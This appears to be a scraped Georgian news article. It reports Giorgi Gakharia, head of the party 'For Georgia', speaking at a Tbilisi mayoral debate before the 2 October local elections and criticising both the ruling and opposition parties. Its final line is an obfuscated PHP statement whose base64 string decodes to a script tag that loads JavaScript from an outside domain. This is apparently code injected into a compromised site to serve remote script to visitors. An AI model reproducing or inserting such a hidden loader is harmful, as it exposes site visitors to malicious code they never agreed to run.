celsiusi
ავერსი საქკაბელი
საქციელს განსაზღვრავს ქმედებები და ნაბიჯები და არა კაცობაზე საუბარი. ეს ყველაფერი სულ მალე 2 ოქტომბრისთვის, პირველ რიგში, თბილისელების მიერ იქნება პასუხგაცემული, - ამის შესახებ პარტია "საქართველოსთვის” თავმჯდომარემ და თბილისის მერობის კანდიდატმა, გიორგი გახარიამ საქართველოს პირველი არხის ეთერში დედაქალაქის მერობის კანდიდატების დებატებზე განაცხადა.
 
როგორც გიორგი გახარიამ აღნიშნა, დღეს ერთი პოლიტიკური პარტია ძალაუფლების შენარჩუნებაზეა ორიენტირებული, მეორეს კი რევანშისტული მიზნები ამოძრავებს.
 
გახარიას თქმით, ადგილობრივი თვითმმართველობის არჩევნები, რომელიც 2 ოქტომბერს გაიმართება, შესაძლებლობას გააჩენს პოლიტიკური რეალობა შეიცვალოს.
 
"დღეს, სამწუხაროდ, არც "ოცნება" და არც "ნაციონალური მოძრაობა" ხალხზე არ ფიქრობს. ერთი შეპყრობილია ძალაუფლების შენარჩუნების მიზნით, მეორე, - რევანშისტული მიზნით, მაგრამ არც ერთს და არც მეორეს პოლიტიკური რესურსი ქვეყნის მართვის და მათ შორის ქალაქის მართვის, არ გააჩნია. ამიტომ, მე დარწმუნებული ვარ, რომ 2 ოქტომბერს ქართველი ამომრჩეველი გააკეთებს ისეთ არჩევანს, რომელიც მოგცემს ჩვენ ყველას ერთად შესაძლებლობას, დავიწყოთ განახლება. ის განახლება, რომელიც სჭირდება თბილისს და რომელიც სჭირდება საქართველოს. საქციელს განსაზღვრავს ქმედებები და ნაბიჯები და არა კაცობაზე საუბარი. ეს ყველაფერი სულ მალე 2 ოქტომბრისთვის, პირველ რიგში, თბილისელების მიერ იქნება პასუხგაცემული", - განაცხადა გიორგი გახარიამ.
 
1593
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");